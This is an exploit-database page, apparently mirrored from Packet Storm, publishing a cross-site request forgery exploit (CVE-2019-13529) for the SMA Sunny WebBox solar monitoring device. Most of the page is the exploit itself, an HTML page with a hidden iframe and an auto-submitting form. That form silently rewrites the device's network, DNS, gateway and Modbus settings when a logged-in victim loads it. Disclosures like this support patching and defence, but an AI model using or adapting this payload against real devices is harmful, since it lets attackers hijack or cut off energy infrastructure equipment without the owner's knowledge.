Lucene search
K

SMA Solar Technology AG Sunny WebBox 1.6 Cross Site Request Forgery

🗓️ 10 Oct 2019 00:00:00Reported by Borja MerinoType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 206 Views

SMA Solar Technology AG Sunny WebBox 1.6 Cross-Site Request Forgery Exploi

Related
Code
`# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery  
# Date: 2019-10-08  
# Exploit Author: Borja Merino and Eduardo Villaverde  
# Vendor Homepage: https://www.sma.de  
# Version: Firmware Version 1.6 and prior  
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)  
# CVE : CVE-2019-13529  
# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01  
  
<!-- Change any hidden value -->  
  
<iframe style="display:none" name="csrf-frame"></iframe>  
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">  
<input type='hidden' name='RadioButtonDhcp' value='off'>  
<input type='hidden' name='IpAddr' value='1.1.1.1'>  
<input type='hidden' name='SubnetMask' value='255.255.255.0'>  
<input type='hidden' name='Gateway' value='1.1.1.1'>   
<input type='hidden' name='DnsIpAddr' value='5.5.5.1'>  
<input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>  
<input type='hidden' name='StaticNatPortHttp' value='80'>  
<input type='hidden' name='WebserverPort' value='80'>  
<input type='hidden' name='WebservicePort' value='80'>  
<input type='hidden' name='RadioButtonModbus' value='off'>  
<input type='hidden' name='ModbusPort' value='502'>  
<input type='hidden' name='BConfirm' value='Confirmar'>  
<input type='submit' value='submit'>  
</form>  
<script>document.getElementById("csrf-form").submit()</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation